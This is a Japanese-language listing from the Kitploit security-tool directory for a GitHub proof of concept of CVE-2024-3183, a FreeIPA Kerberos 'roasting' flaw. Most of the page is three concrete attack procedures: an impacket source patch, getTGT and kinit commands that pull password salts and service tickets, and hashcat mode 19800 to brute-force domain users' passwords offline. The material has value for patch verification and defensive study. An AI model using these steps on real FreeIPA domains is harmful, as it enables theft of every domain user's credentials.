Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/im10n/cve-2024-3183-poc
パスワード攻撃脆弱性分析エクスプロイトペネトレーションテスト認証
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

CVE-2024-3183 (FreeIPA Rosting) の PoC

リポジトリを見る
29292年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-3183-POC

CVE-2024-3183 (FreeIPA Rosting) の PoC

影響: 低権限ユーザーがすべてのドメインユーザーのパスワードのハッシュを取得し、オフラインでブルートフォース攻撃(kerberoasting)を実行できます。

impacket-getTGT へのパッチ:

  1. impacket/krb5/kerberosv5.py に decoder.decode.defaultErrorState = stGetValueDecoderByTag を追加します。
  2. 完了!

POC1:

  1. impacket/krb5/kerberosv5.py に decoder.decode.defaultErrorState = stGetValueDecoderByTag を追加します。
  2. impacket-getTGT を -service オプションと -debug オプションと共に使用することで、1つのコマンドで salt を取得できます。 impacket-getTGT test.local/user -debug -service admin

POC2:

  1. まず、既に侵害されているユーザー "admin" の TGT チケットを要求します。 kinit user foto1
  2. 次に、"admin" ユーザーの salt を調べます: printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. "admin" の TGS を取得します: kvno admin foto foto3
  4. Python スクリプト(または特定の salt を使用した hashcat モード 19800)を使用して TGS をブルートフォースします。 foto4

1 - TGS, 2 - SALT, 3 - パスワード.

  1. おめでとうございます。これでユーザー "admin" のパスワードを取得できました。

POC3:

  1. 以下のコマンドで一発で実行できます: kinit -S target user これにより、対象ユーザーのキーで暗号化された TGT を取得できます。
ツールをダウンロード